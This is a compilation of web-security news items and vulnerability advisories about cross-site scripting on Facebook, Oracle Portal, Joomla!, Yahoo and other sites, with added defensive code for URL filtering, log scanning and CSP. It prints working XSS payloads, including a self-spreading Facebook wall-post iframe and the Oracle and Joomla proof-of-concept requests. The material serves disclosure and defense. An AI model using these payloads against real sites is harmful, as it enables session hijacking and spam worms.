
Recent Facebook XSS Attacks Show Increasing Sophistication

A few weeks ago, three separate cross-site scripting (XSS) vulnerabilities on Facebook sites were uncovered within a period of about 10 days. At least two of these holes were used to launch viral links or attacks on users – and it’s clear that attacks against Facebook users are becoming increasingly sophisticated.
The first issue came from a page on the mobile version of Facebook’s site. The interface was a prompt for posting stories to a user’s wall, and the parameter for the text of the prompt did not properly escape output. On March 28, a blogger identifying themselves as “Joy CrazyDaVinci” posted code that demonstrated how the vulnerability could be used to spread viral links:
<iframe id="CrazyDaVinci" style="display:none;"
src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='Just visited http://y.ahoo.it/gajeBA Wow.. cool! nice page dude!!!';document.forms[0].submit();}</script>"></iframe>
This bit of HTML would be included in a viral page. The code sets the content of the wall post to a message that includes a link to a viral page, then submits the prompt automatically. Anyone clicking the link would get the same code executed on their account. The viral page could be used for malware distribution or phishing attacks, but in most cases where I saw this trick used, the page simply loaded advertisements or “offer spam”.
By the next day, several links were spreading virally and caught the attention of security researchers. Facebook moved quickly to patch the issue, and Crazy DaVinci issued an apology for the example code, explaining that versions of it had actually been circulating for several days prior and that the demonstration was intended to push Facebook for a fix.
On April 3, another XSS problem came to light, this time with a Facebook “channel” page used for session management. Both another security researcher and I had previously looked at this interface and found it properly escaped, so it’s likely a code update mistakenly changed the page’s behavior. Facebook again patched the problem soon after news of it spread.
I didn’t observe any viral exploitation of the second vulnerability in the wild, but after the first problem came to light, I noted that it was mostly used to submit a form already on the page for posting links. The payload made use of functionality within the vulnerable page, but XSS allows an attacker to do far more. I wondered when we might see a Facebook attack that made greater use of cross-site scripting’s potential.

What a Difference a Space Makes

I didn’t have to wait long. On April 7, I got word via Twitter of a Facebook app that had live XSS, but the app had disappeared before I got to see it in action. At first, I thought this was yet another case of XSS within the context of a Facebook app. But I soon found other versions of the app which were still online, and I quickly realized this was actually an XSS problem with the Facebook Platform. Also, the XSS payload being used did much more than submit a form.
The attack used FBML-based Facebook apps, which render in the context of an apps.facebook.com page. Normally, Facebook filters code to prevent any scripts from directly modifying the page’s DOM, but the XSS problem gave attackers a bypass. When a user visited the app page, they would see what appeared to be a fairly benign page with a popular video.
Unlike many Facebook page scams, the promised video actually works – if you click play, the video will load and nothing unusual seems to happen. But as the code screenshot below reveals, that click does much more than load the video.
When the page first loads, the “video” is actually just an image placeholder with a link. Part of the href parameter for that link is shown above. Note the space after the opening quotation mark – that’s where the XSS comes in. Normally, Facebook would block a link to a javascript: URL. Adding the space worked around Facebook’s filters, but the browser would still execute the rest of the parameter.
According to Facebook, it turned out that some older code was using PHP’s built-in parse_url function to determine allowable URLs. For example, while parse_url("javascript:alert(1)") yields a scheme of "javascript" and a path of "alert(1)", adding whitespace gives a different result: parse_url(" javascript:alert(1)") does not return a scheme and has a path of "javascript:alert(1)". Because the filter only looked at the scheme the parser reported, a URL with a leading space passed the check while the browser still treated it as a javascript: URL. Other PHP developers should take note of the difference if parse_url is being used in security-related code.
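The whitespace trick is a parser-disagreement bug: the filter's URL parser and the browser's parser do not agree on where the scheme starts. The following Python is an added example, not code from the original post or from Facebook; it models the class of check described above (a scheme is only recognised when it begins at the first character, as with parse_url), shows that check letting a whitespace-prefixed javascript: URL through, and places a hardened allowlist check beside it. The ALLOWED_SCHEMES set, the control-character stripping and the function names are this example's own assumptions.

```python
import re

# Assumed allowlist of link schemes the filter should permit (example's own choice).
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# A scheme token is only recognised at index 0, mimicking parse_url's behaviour.
SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")


def naive_scheme(url: str) -> str:
    """Return the scheme a parse_url-style parser reports, or '' if it sees none.
    ' javascript:alert(1)' yields '' because the scheme does not start at index 0."""
    m = SCHEME_RE.match(url)
    return m.group(1).lower() if m else ""


def naive_is_safe_href(url: str) -> bool:
    """The weak check: block only when the parser reports a 'javascript' scheme.
    Leading whitespace hides the scheme from the parser, so the URL is allowed,
    while a browser still strips the whitespace and runs it."""
    return naive_scheme(url) != "javascript"


def normalise(url: str) -> str:
    """Strip surrounding whitespace and ASCII control characters before parsing,
    so the filter sees the URL the way a browser will (assumption: browsers
    ignore tabs/newlines inside the scheme, e.g. 'java\\tscript:')."""
    url = url.strip()
    return "".join(ch for ch in url if ord(ch) >= 0x20 and ch != "\x7f")


def hardened_is_safe_href(url: str) -> bool:
    """Allowlist check: normalise first, then require a known-good scheme.
    URLs without a scheme are accepted only in clearly relative forms."""
    url = normalise(url)
    scheme = naive_scheme(url)
    if scheme:
        return scheme in ALLOWED_SCHEMES
    return url == "" or url.startswith(("/", "?", "#"))


if __name__ == "__main__":
    for candidate in ["https://example.com/x", " javascript:alert(1)", "java\tscript:alert(1)"]:
        print(repr(candidate), "naive:", naive_is_safe_href(candidate),
              "hardened:", hardened_is_safe_href(candidate))
```

The defensive point is that a denylist keyed on what a particular parser reports will always be one parser quirk away from a bypass; an allowlist applied after normalisation does not depend on the parser noticing the dangerous case.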

A More Advanced Attack

Clicking the link executed an inline script that in turn added a script element to the page. This loaded more code from a remote address and included several parameters in the GET request. The parameters set variables within the remote code that specified what video to load, what URLs to use for viral posts, and so on. Multiple Facebook apps and domains were used for the viral links, but the main script always came from the same host. This helped the attack persist, since blocking one site would not stop it and the central code was loaded dynamically.
The remote code handled actually loading the video, but also included a number of functions which make use of having script access in a facebook.com context. The script would set the user as attending spam events, invite friends to those events, “like” a viral link, and even send IMs to friends using Facebook Chat.
When I came across the attack, one block of code had been commented out, but one blogger discovered a version of the attack a few days prior and saw it in action. This part loaded a fake login form which actually sent the entered username and password to a log interface on the attacker’s server. (Remember, this phishing form would appear in the context of a page with typical Facebook chrome.) Since the attack page would load even if a user was not logged in to Facebook, this could have also been a way to make sure a session was available before launching the other functions.
Fake videos and viral links are nothing new on Facebook, but most of these scams tend to be fairly simple. In fact, it’s not hard to find forums where people offer boilerplate code for launching such schemes – much like the first XSS worm above which simply submitted a form. But the April XSS attack involved multiple domains, multiple user accounts, and multiple methods for spreading and hijacking user accounts. And it still only scratched the surface of what’s possible with an XSS vulnerability. I expect we’ll see more XSS-based attacks and more powerful payloads in the future.

Postscript on Real-Time Research

I came across the April attack late one afternoon as I was preparing to leave work… so I could present on XSS at a local OWASP meeting! Those following me on Twitter saw a somewhat frantic stream of tweets as I tried to find live examples of the attack and sorted through the code while closely watching the clock and wrapping up last-minute presentation details. Earlier this week, I did some searching to review information for this post, and I came across this article from eWEEK: “Facebook Bully Video Actually an XSS Exploit”.
I was a bit surprised by it, as I hadn’t known about it before and saw that it quoted me. I then realized it was quoting my tweets! I then read that I had “confirmed to eWEEK on Twitter” one aspect of the story. At first I was confused, but then remembered that during my flood of tweeting, another user had sent an @ reply asking about the very detail the story talked about. Checking that tweet again, I found out the question had come from the article’s author.
I relate all this not because any of it bothered me, simply because (1) I found it somewhat fascinating that a few quick Twitter updates could become the primary source for a news article and (2) I was humbled to realize that a few quick Twitter updates could become the primary source for a news article! While it’s great that a story can spread so fast, it certainly gave me a reminder to be careful when discussing topics of interest on a public forum. But I’m glad I can do my part in helping raise awareness of online dangers, particularly the implications of XSS.


XSS in Oracle AS Portal 10g


I. VULNERABILITY
-------------------------
XSS in Oracle Portal Database Access Descriptor

II. BACKGROUND
-------------------------
Oracle AS Portal is a Web-based application for building and deploying
portals. It provides a secure, manageable environment for accessing
and interacting with enterprise software services and information
resources.

III. DESCRIPTION
-------------------------
A reflected XSS vulnerability has been detected in Oracle Application
Server that allows arbitrary HTML/script code to be executed in the
context of the victim user's browser.

The code injection is done through the DAD name. A DAD (Database
Access Descriptor) is a set of values that specifies how a database
server should fulfill an HTTP request.

IV. PROOF OF CONCEPT
-------------------------
Original request:
http://<oracle-application-server>/portal/pls/<DAD>

Malicious request:
http://<oracle-application-server>/portal/pls/<XSS injection>

Example 1:
http://<oracle-application-server>/portal/pls/"<H1>XSS vulnerability<XSS

In this scenario, the attacker has the difficulty of being unable to
close the HTML tag, because the character "/" cannot be added as part
of the code injection (DAD name). However, it is possible to generate
that character without it appearing in the injection. Below is an example.

Example 2:
http://<oracle-application-server>/portal/pls/"<img src=""
onmouseover="document.body.innerHTML=String.fromCharCode(60,72,84,77,76,62,60,72,49,62,88,83,83,60,47,72,49,62,32,60,72,50,62,86,85,76,78,60,47,72,50,62);"><XSS

V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted
user's browser; this can be leveraged to steal sensitive information
such as user credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-------------------------
Tested in Oracle Application Server Portal (Oracle AS Portal) 10g,
version 10.1.2. Other versions may be affected too.

VII. SOLUTION
-------------------------
Install the latest CPU (Critical Patch Update).

VIII. REFERENCES
-------------------------
http://www.oracle.com
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered
by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
August  11, 2010: Initial release
May     01, 2011: Final revision

XI. DISCLOSURE TIMELINE
-------------------------
August  11, 2010: Discovered by Internet Security Auditors
August  11, 2010: Oracle contacted including PoC.
August  12, 2010: Oracle informs that it will investigate
                  the vulnerability.
April   19, 2011: Oracle fixed the vulnerability in the
                  CPU (Critical Patch Update).
May     01, 2011: Sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

XIII. ABOUT
-------------------------
Internet Security Auditors is a Spain-based leader in web application
testing, network security, penetration testing, and security compliance
implementation and assessment. Our clients include some of the largest
companies in areas such as finance, telecommunications, insurance,
ITC, etc. We are a vendor-independent provider with deep expertise
since 2001. Our R&D efforts include vulnerability research, open
security project collaboration and whitepapers, presentations and
security event participation and promotion. For further information
regarding our security services, contact us.


Egyptian Hackers Selling Zero-day Exploit of Yahoo Mail For $700


Those who frequent underground hacker communities know very well that illicit goods such as botnets, zero-day exploits, the Blackhole exploit kit, malware, undisclosed vulnerabilities and so on are sold there at various prices. Those products are generally priced between $5 and $500, but today I will talk about an expensive product that listed itself at the top of the black market: a new cross-site scripting exploit that enables attackers to steal cookies and access Yahoo email accounts. According to a blog post by Krebs on Security: A zero-day vulnerability in yahoo.com that lets attackers hijack Yahoo! email accounts and redirect users to malicious Web sites offers a fascinating glimpse into the underground market for large-scale exploits. The exploit, being sold for $700 by an Egyptian hacker on an exclusive cybercrime forum, targets a “cross-site scripting” (XSS) weakness in yahoo.com that lets attackers steal cookies from Yahoo! Webmail users. Such a flaw would let attackers send or read email from the victim’s account. In a typical XSS attack, an attacker sends a malicious link to an unsuspecting user; if the user clicks the link, the script is executed, and can access cookies, session tokens or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. The hacker posted the following video to demonstrate the exploit for potential buyers.


“I’m selling Yahoo stored xss that steal Yahoo emails cookies and works on ALL browsers,” wrote the vendor of this exploit, using the hacker handle ‘TheHell.’ “And you don’t need to bypass IE or Chrome xss filter as it do that itself because it’s stored xss. Prices around for such exploit is $1,100 – $1,500, while I offer it here for $700. Will sell only to trusted people cuz I don’t want it to be patched soon!” -said the hacker.  
In response Ramses Martinez, director of security at Yahoo!, said the challenge now is working out the exact yahoo.com URL that triggers the exploit, which is difficult to discern from watching the video. “Fixing it is easy, most XSS are corrected by simple code change,” Martinez said. “Once we figure out the offending URL we can have new code deployed in a few hours at most.”






CISCO & Intel is Vulnerable To XSS Said Ion (Team Openfire)

A hacker named Ion from Team Openfire has found security holes in the official website of CISCO Developer and in the Intel® Processors and Boards Compatibility Tool. The hacker claimed that he reported the vulnerabilities to both companies. Having received no positive reply from them, he decided to disclose that the CISCO and Intel websites are vulnerable to non-persistent XSS attacks.

Intel:- 

The above screenshot was submitted by the hacker and clearly indicates that Intel is indeed vulnerable to an XSS attack. According to the hacker, the search box of the Intel® Processors and Boards Compatibility Tool is vulnerable to XSS. Intel later confirmed that the security hole has been patched.

CISCO:-

Yet again the hacker also submitted a screenshot which clearly indicates that CISCO is indeed vulnerable to an XSS attack. Here again he shared the vulnerable link with us. So far CISCO has not taken this one seriously, and the vulnerability remains unpatched.




Skype Shop & National Geographic Germany (Nat Geo) Vulnerable to XSS

Skype Shop & National Geographic Germany (Nat Geo) Vulnerable to XSS -Said Dr41DeY
A couple of weeks ago I talked about the vulnerability in the Cartoon Network official website; today I am going to speak about two more big fish with serious security holes in their official websites. Let's not waste time stretching the preface and come directly to the story: the hacker who has recently made his name with some big hacks is back again.
Many of you are right, I am talking about 'Dr41DeY', because he is the guy who found vulnerabilities in the official websites of Skype Shop and National Geographic Channel Germany (Nat Geo). Both Nat Geo and Skype have a non-persistent cross-site scripting vulnerability, also known as an XSS vulnerability, in their websites. We have already informed the concerned authorities and webmasters of this issue to avoid misfortune. As expected, while this was being written Skype took the issue seriously and fixed their loopholes immediately. Still, as proof, I have shared the screenshots above with our readers as evidence of the XSS hole. But unlike Skype Shop, Nat Geo has not yet responded, so the vulnerability still exists on their portal. Hopefully they will take appropriate steps without further delay. For updates on this story and other hot cyber issues, stay tuned with VOGH. Before concluding, I would like to remind you that in 2012 an Indian hacker named Akshay found XSS holes in the official website of National Geographic. A year later, Dr41DeY found another Nat Geo site vulnerable to XSS, which definitely raises doubts about the security posture of one of the world's leading satellite television channels featuring documentaries with factual content involving nature, science, culture, and history, plus some reality and pseudo-scientific entertainment programming.



Google Chrome OS Has Security Hole (Black Hat 2011)


Black Hat Google has billed its Chrome operating system as a security breakthrough that's largely immune to the threats that have plagued traditional computers for decades. With almost nothing stored on its hard drive and no native applications, there's no sensitive data that can be pilfered and it can't be commandeered when attackers exploit common software vulnerabilities.
But according to two researchers who spent the past few months analyzing the Chrome-powered Cr-48 beta released in December, the browser-based OS is vulnerable to many of the same serious attacks that afflict people surfing websites. As a result, users remain susceptible to exploits that can intercept email, documents, and passwords stored on centralized servers, many of which are maintained by Google.
“Even though they put these awesome security protections in place, we're just moving the security problems to the cloud now,” Matt Johansen, a researcher with WhiteHat Security, told The Register. “We're moving the software security problem that we've been dealing with forever to the cloud. They're doing a lot of things right, but it's not the end all and be all for security.”
Virtually all of the threats identified by Johansen and his WhiteHat colleague Kyle Osborn stem from Chrome's reliance on extensions, which are essentially web-based applications. A fair number of the extensions they analyzed contain XSS, or cross-site scripting, bugs, which have the potential to inject malicious code and content into a visitor's browser and in some cases steal credentials used to authenticate user accounts.
As they went about testing what kind of attacks various XSS vulnerabilities could allow, Johansen and Osborn noticed something curious: a bug in one extension often allowed them to hijack the communications of a second extension, even when the latter one had no identifiable security flaws. At the Black Hat security conference in Las Vegas on Wednesday, they demonstrated this weakness by exploiting an XSS hole in one extension to steal passwords from an otherwise secure account on cloud password storage service LastPass.
“If any of the other vulnerable extensions have an XSS hole, we can utilize JavaScript to hijack that communication,” Johansen said. “LastPass is doing absolutely nothing wrong here. You can have an extension that's perfectly fine, but if you have another that has a cross-site scripting error in it we can still access information in secure applications.”
The discovery has generated a quandary for the researchers.
“Whose problem is this to fix?” Johansen continued. “We don't really have an answer for that. LastPass did everything correctly. It's the other extension developers that developed an extension with a vulnerability in it.”
After being informed of the specific attack, LastPass made changes to its Chrome extension that prevented it from being carried out, so it's reasonable to assume extension makers foot some of the responsibility for preventing their apps from being compromised by others. But Johansen couldn't rule out the possibility that vulnerabilities and other apps could probably make LastPass vulnerable again. He said Google might be able to fix the problem by overhauling the application programming interfaces extension developers use.
The researchers also demonstrated an XSS vulnerability in Scratchpad, a text-editor extension that's bundled with Chrome. By sharing files with names containing JavaScript commands stored on Google Docs they were able to obtain the Google session cookies of anyone who used a Chromebook to view the documents. An attacker could exploit the vulnerability to read a victim's email, or to send instant messages to everyone on the victim's contact list. If any of the contacts are using Chromebooks, they could be similarly vulnerable to booby-trapped filenames stored on Google Docs.
A Google spokeswoman defended the security of Chromebooks and said the vulnerabilities enumerated by the researchers weren't unique to the cloud-based OS. In an email, she issued the following statement:
This conversation is about the web, not Chrome OS. Chromebooks raise security protections on computing hardware to new levels. They are also better equipped to handle the web attacks that can affect browsers on any computing device, thanks in part to a carefully designed extensions model and the advanced security available through Chrome that many users and experts have embraced.
The researchers stressed Google engineers were extremely quick to fix the Scratchpad vulnerability and awarded them a $1,000 bounty for their report. But they remain convinced that the security of Chrome OS in many cases is only as strong as its weakest extensions. They also pointed out that penetration-testing tools such as the Browser Exploitation Framework could be used to help streamline attacks in much the way Metasploit is used to manage exploits for traditional machines.
And, Johansen said, Chrome hacking through XSS may be only the beginning, since the flaws are among the easiest to find and exploit.
“Who knows what we're going to be looking for months or years from now when Google can figure out a way to thwart the cross-site scripting threat,” he said. “Why would we be trying to write buffer overflows when we can just write a simple JavaScript command.” 
-News Source (The Register)


Cartoon Network (CN) Official Website is Vulnerable to XSS Attack

XSS Vulnerability Found in Cartoon Network's (CN) Official Website By Dr41DeY 
After the successful breach of 'DY365 TV', the hacker going by the name of Dr41DeY from Nigerian Cyber Army has yet again targeted another TV network. Guess what, this time he caught an even bigger fish. Unlike a defacement or breach, this time the hacker did something that can be called ethical, or categorized as white-hat. Okay, now without pulling the intro any longer, let's come directly to the story: the official website of Cartoon Network is vulnerable to a cross-site scripting attack, also known as an XSS attack. Cartoon Network, mostly known as CN, is the world's leader in broadcasting animated programming, ranging from action to animated comedy and many more. This satellite channel is the most preferred channel for children and teenagers between the ages of 7 to 5 across the whole world. So it is quite indisputable that the official website of Cartoon Network (CN) is indeed a valuable website which has a large amount of traffic every day. But it is unclear why, being such a big and popular brand name, CN committed such a blunder as leaving an XSS vulnerability in their official portal. Dr41DeY shared with VOGH that the search box on the home page of CN has a non-persistent XSS vulnerability. The above screenshots were taken as proof of the story. I, on behalf of Team VOGH, have already contacted the CN authorities and notified them about this issue. Hopefully they will take appropriate steps without any further delay. For updates on this story and other hot cyber issues, stay tuned with VOGH.



Multiple XSS Vulnerabilities Found in Joomla! 1.7.0


Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site Scripting issues.

About Joomla:- 
Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) Web application framework that can also be used independently.
Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization.


Vulnerability Description:-

Several parameters (searchword, extension, asset, author) in Joomla! core components are not properly sanitized upon submission to the /index.php URL, which allows an attacker to conduct a cross-site scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser.


Version Affected:-
1.7.0 and earlier


PROOF-OF-CONCEPT/EXPLOIT:-
parameter: searchword, component: com_search (Browser: IE, Konqueror)
=======================================================
N.B. Our previous reported issue of "searchword" parameter XSS was not fixed completely.

[REQUEST]
POST /joomla17_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456

task=search&Itemid=435&searchword=Search';onunload=function(){x=confirm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssssssssss&option=com_search
[/REQUEST]

User Login is required to execute the following XSSes.

Parameter: extension, Component:-
http://localhost/joomla17_noseo/administrator/index.php?option=com_categories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22

Parameter:-
http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22&author=

Parameter:-
http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=&author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22

Impact:-
Attackers can compromise the currently logged-in user/administrator session and impersonate arbitrary user actions available under the /administrator/ functions.

Solution:-
Upgrade to Joomla! 1.7.1-stable or higher.
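Both the Oracle Portal advisory above and these Joomla! proofs of concept carry reflected payloads in the request URL, which means the probes leave a trace in the web server's access log. As an added example that is not part of either advisory, the following Python runs simple reflected-XSS indicators (HTML tag names, on* event handlers, String.fromCharCode, javascript: URLs) over percent-decoded request targets. The log lines are constructed for this example in common log format and only mirror the shapes of the published proofs of concept; the indicator list and field names are this example's own assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (common log format). Not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Aug/2010:10:00:01 +0200] "GET /portal/pls/portal HTTP/1.1" 200 512
10.0.0.5 - - [11/Aug/2010:10:00:02 +0200] "GET /portal/pls/%22%3Cimg%20src=%22%22%20onmouseover=%22document.body.innerHTML=String.fromCharCode(60,72,49,62)%22%3E%3CXSS HTTP/1.1" 404 880
10.0.0.9 - - [11/Aug/2010:10:01:00 +0200] "POST /index.php?option=com_search&searchword=Search%27;onunload=function(){alert(1)};// HTTP/1.1" 200 2048
10.0.0.7 - - [11/Aug/2010:10:02:00 +0200] "GET /administrator/index.php?option=com_categories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22 HTTP/1.1" 403 0
10.0.0.8 - - [11/Aug/2010:10:03:00 +0200] "GET /index.php?option=com_search&searchword=oracle+portal HTTP/1.1" 200 3000
"""

# Common log format: client ip, identity, user, [timestamp], "METHOD target PROTO", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Indicators of reflected-XSS probing, applied to the *decoded* request target.
INDICATORS = [
    ("html_tag", re.compile(r"<\s*(script|img|iframe|svg|body)\b", re.I)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("fromcharcode", re.compile(r"String\.fromCharCode", re.I)),
    ("js_scheme", re.compile(r"javascript\s*:", re.I)),
]


def decode_target(target: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded payloads are visible."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def scan_line(line: str):
    """Return a finding dict for a suspicious request line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    hits = [name for name, rx in INDICATORS if rx.search(decoded)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "status": m.group("status"),
            "target": decoded, "indicators": hits}


def scan_log(text: str):
    """Scan every line of an access log and collect findings in order."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["status"], finding["indicators"], finding["target"][:60])
```

Two details matter in practice: decoding before matching, because the published proofs of concept percent-encode the quotes and brackets, and recording the response status, since a 200 to a probe like these is a stronger signal that the parameter reflects than a 403 or 404.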

-News Source (Joomla!)




Yahoo Mail Hit By XSS Exploit Putting 400 Million Users At Risk


Yet again mistrust is growing among the large number of Yahoo users, as Yahoo has continuously failed to protect its customers from cyber attacks. Late last year we saw two major Yahoo services get compromised, affecting millions of registered users across the globe. First it was Yahoo Voice, which was hacked, putting 450K users at high risk. Then it was the turn of Yahoo Mail, where an Egyptian hacker found a serious XSS vulnerability in the Yahoo mail service that lets attackers steal cookies from Yahoo Webmail users. Cyber criminals later made a product out of that loophole; that so-called product, widely known as an exploit, was made available at a high price in underground markets and forums. As expected, Yahoo immediately patched these loopholes, but now it seems they did not learn the lesson from the recent past.
You may all be wondering: what happened? Once again Yahoo's security has fallen victim to hackers. Shahin Ramezany, a hacker and independent security researcher, has found a DOM-based XSS vulnerability in Yahoo Mail that is exploitable in all major browsers. Ramezany tweeted about this issue with a link to a YouTube video in which he demonstrated the hack. Shahin Ramezany also claimed that the exploit puts more than 400 million Yahoo users at risk.


As soon as this story got spotted, Yahoo immediately responded to the matter. In their official release a Yahoo spokesman said "We’ve been looking into it and the US have now confirmed that they are investigating too. They will be in touch if there is a comment – otherwise I recommend that if users are concerned then they should change their passwords immediately."

Later Yahoo said that thy have plugged the security hole. In their statement the spokesperson added, “At Yahoo! we take security very seriously and invest heavily in measures to protect our users and their data. We were recently informed of an online video that demonstrated a vulnerability. We confirm that the vulnerability has been fixed. In addition, we are investigating recent reports of increased abusive traffic and will work diligently to fix any vulnerabilities that are found. Concerned users are encouraged to change their passwords to a safe password that combines letters, numbers, and symbols.”

But the issue was not completely resolved: immediately after Yahoo released the fix, Shahin Ramezany said that the fix is not good enough and the Yahoo Mail exploit is still active. On Twitter he said it was "not effective enough and users are still [at] risk," since the proof-of-concept code can be easily tweaked to continue attacks.






Firefox 4 vs. Internet Explorer 9: Which is Safer???




The app frenzy is fueling the browser wars and accelerating the need for browser development and updates. Chrome seems to update daily, Firefox is getting faster in response, and Microsoft is talking IE 10 just as IE9 gets fully out of the gate.
Because of the constant changes, it's hard to truly evaluate any given browser on any given day. Even so, there are certain key elements that distinguish one browser from another in terms of security. Here's how two of them, Firefox 4 and Internet Explorer 9, measure up:


Firefox 4
Firefox 4 is packed with security features aimed at resolving common, but difficult-to-avoid attacks such as cross site scripting (XSS), redirects from secure HTTPS webpages to plain old HTTP, and click-jacking.


Firefox 4 supports Content Security Policy (CSP): the server sends a header listing the sources of script (and other content) the page legitimately uses, and the browser refuses to run anything that is not on that list, including inline script injected by a reflected XSS payload. The policy has to come from the server, so a site that does not send the header gets no benefit.
This beats the heck out of the older approach of comparing strings in the request against strings in the response in the remote hope of spotting a reflected payload. Not only is the string approach akin to matching needles in thousands of remote haystacks; when it did deliver a finding, that finding was often wrong. Developers often turned such filters off, as with IE8's X-XSS-Protection header, out of sheer frustration.


However, CSP can also break a site: if the developer's policy fails to list every source the site legitimately loads from (a CDN, an analytics script, inline event handlers), the browser blocks that content too, which looks like a false positive to the user. Still, CSP beats the string approach hands-down, and a policy can be trialled in report-only mode before it is enforced.
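To make the two behaviours concrete, here is an added example, not Firefox's code or anything from the original article: a minimal CSP source matcher that decides whether a script may run under a given policy. It handles only `'self'`, `'none'`, `'unsafe-inline'`, scheme, host and `*.host` sources (no nonces, hashes or path matching), and the hosts `www.example.com` and `cdn.example.net` are assumptions chosen for illustration.

```javascript
// Added example: a minimal Content-Security-Policy source matcher. NOT the
// browser's implementation: nonces, hashes, path matching and default-port
// normalisation are omitted. Hosts used below are assumptions.

// "default-src 'self'; script-src 'self' https://cdn.example.net"
//   -> { 'default-src': ["'self'"], 'script-src': ["'self'", "https://cdn.example.net"] }
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    policy[name.toLowerCase()] = sources;
  }
  return policy;
}

// Does one source expression ('self', https://cdn.example.net, *.example.com,
// https:) permit loading `url` from a page whose origin is `pageOrigin`?
function sourceMatches(source, pageOrigin, url) {
  if (source === "'self'") return url.origin === pageOrigin;
  if (source.startsWith("'")) return false;        // 'none', 'unsafe-inline', ... never match a URL
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) {      // scheme-only source such as https:
    return url.protocol === source.toLowerCase();
  }
  let expr = source;
  const schemeMatch = expr.match(/^([a-z][a-z0-9+.-]*):\/\/(.*)$/i);
  if (schemeMatch) {
    if (url.protocol !== schemeMatch[1].toLowerCase() + ':') return false;
    expr = schemeMatch[2];
  }
  const [hostPattern, port] = expr.split('/')[0].split(':');
  if (port && port !== '*' && port !== url.port) return false;
  if (hostPattern === '*') return true;
  if (hostPattern.startsWith('*.')) {
    const suffix = hostPattern.slice(1);            // ".example.com"
    return url.hostname.endsWith(suffix) && url.hostname.length > suffix.length;
  }
  return url.hostname.toLowerCase() === hostPattern.toLowerCase();
}

// Decide whether a script may run on a page at `pageOrigin` under `header`.
// inline=true models a <script> block injected into the page (the reflected
// XSS case); src models an external script the page tries to load.
function cspAllowsScript(header, pageOrigin, { inline = false, src = null } = {}) {
  const policy = parseCsp(header);
  const sources = policy['script-src'] || policy['default-src'];
  if (!sources) return true;                        // no applicable directive: unrestricted
  if (inline) return sources.includes("'unsafe-inline'");
  const url = new URL(src, pageOrigin);
  return sources.some((s) => sourceMatches(s, pageOrigin, url));
}

// The situations described in the text, each expected to be true.
function demo() {
  const page = 'https://www.example.com';
  const strict = "default-src 'self'";
  return {
    // an injected <script>alert("A")</script> is inline script: blocked
    reflectedPayloadBlocked: !cspAllowsScript(strict, page, { inline: true }),
    // the site's own script still loads
    ownScriptAllowed: cspAllowsScript(strict, page, { src: '/js/app.js' }),
    // the "false positive": a legitimate CDN the developer forgot to list
    forgottenCdnBlocked: !cspAllowsScript(strict, page, { src: 'https://cdn.example.net/app.js' }),
    // listing it fixes the breakage without re-enabling inline script
    cdnListedAllowed: cspAllowsScript("default-src 'self'; script-src 'self' https://cdn.example.net",
      page, { src: 'https://cdn.example.net/app.js' }),
    // 'unsafe-inline' gives the XSS protection away again
    unsafeInlineReopensXss: cspAllowsScript("script-src 'self' 'unsafe-inline'", page, { inline: true }),
  };
}

console.log(demo());
```

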